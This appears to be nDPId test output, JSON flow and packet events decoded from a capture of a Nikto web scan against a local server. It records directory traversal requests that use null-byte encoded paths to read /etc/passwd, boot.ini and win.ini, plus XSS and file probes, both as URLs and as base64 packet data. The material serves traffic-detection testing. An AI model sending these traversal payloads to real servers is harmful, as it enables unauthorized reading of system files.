+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1576420276839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1576420276839,"pkt":"AAAAAAAAAAAAAAAACABFAAEW4vNAAEAGWOx\/AAABfwAAAcJqH5CF6NrJzvbnOoAYAED\/CgAAAQEICp1m+4+dZvuOR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvYm9vdC5pbmklMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRpcmVjdG9yeSB0cmF2ZXJzYWwgY2hlY2spDQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1576420276840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1576420276840,"pkt":"AAAAAAAAAAAAAAAACABFAAEXDe5AAEAGLfF\/AAABfwAAAcJsH5C64jXXMX558oAYAED\/CwAAAQEICp1m+5CdZvuQR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL2hvc3RzJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non 
Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7560000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00798{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1576420276841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1576420276841,"pkt":"AAAAAAAAAAAAAAAACABFAAEi9VxAAEAGRnd\/AAABfwAAAcJuH5BHUs1h0rvodIAYAED\/FgAAAQEICp1m+5GdZvuRR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvSEFTSCgweDU1NTllODRmYmM0MCklMDAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7560000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7560000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1576420276842,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":297,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":297,"pkt_l4_len":263,"thread_ts_msec":1576420276842,"pkt":"AAAAAAAAAAAAAAAACABFAAEbV1RAAEAG5IZ\/AAABfwAAAcJwH5AGYW9pnm57IYAYAED\/DwAAAQEICp1m+5KdZvuSR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2lubnQvd2luLmluaSUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7560000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7560000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1576420276844,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1576420276844,"pkt":"AAAAAAAAAAAAAAAACABFAAEdYctAAEAG2g1\/AAABfwAAAcJyH5D8wFnzKu6RnoAYAED\/EQAAAQEICp1m+5SdZvuUR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2luZG93cy93aW4uaW5pJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KDQo="} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7560000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on 
Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7560000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1576420276847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1576420276847,"pkt":"AAAAAAAAAAAAAAAACABFAAEYOOhAAEAGAvZ\/AAABfwAAAcJ0H5DjgwDevH40fYAYAED\/DAAAAQEICp1m+5adZvuWR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL3Bhc3N3ZCUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCg0K"} 
+01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7560000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1576420276856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276856,"pkt":"AAAAAAAAAAAAAAAACABFAADBvW9AAEAGfsV\/AAABfwAAAcJ2H5DTj4VUAEbtioAYAED+tQAAAQEICp1m+6CdZvugR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1576420276858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276858,"pkt":"AAAAAAAAAAAAAAAACABFAADB2xVAAEAGYR9\/AAABfwAAAcJ4H5D77OMujr7QhoAYAED+tQAAAQEICp1m+6KdZvuiR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1576420276859,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276859,"pkt":"AAAAAAAAAAAAAAAACABFAADApHlAAEAGl7x\/AAABfwAAAcJ6H5CcwpxJV58CXYAYAED+tAAAAQEICp1m+6OdZvujR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1576420276860,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276860,"pkt":"AAAAAAAAAAAAAAAACABFAADALy9AAEAGDQd\/AAABfwAAAcJ8H5ChphcTD1c5UYAYAED+tAAAAQEICp1m+6SdZvukR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non 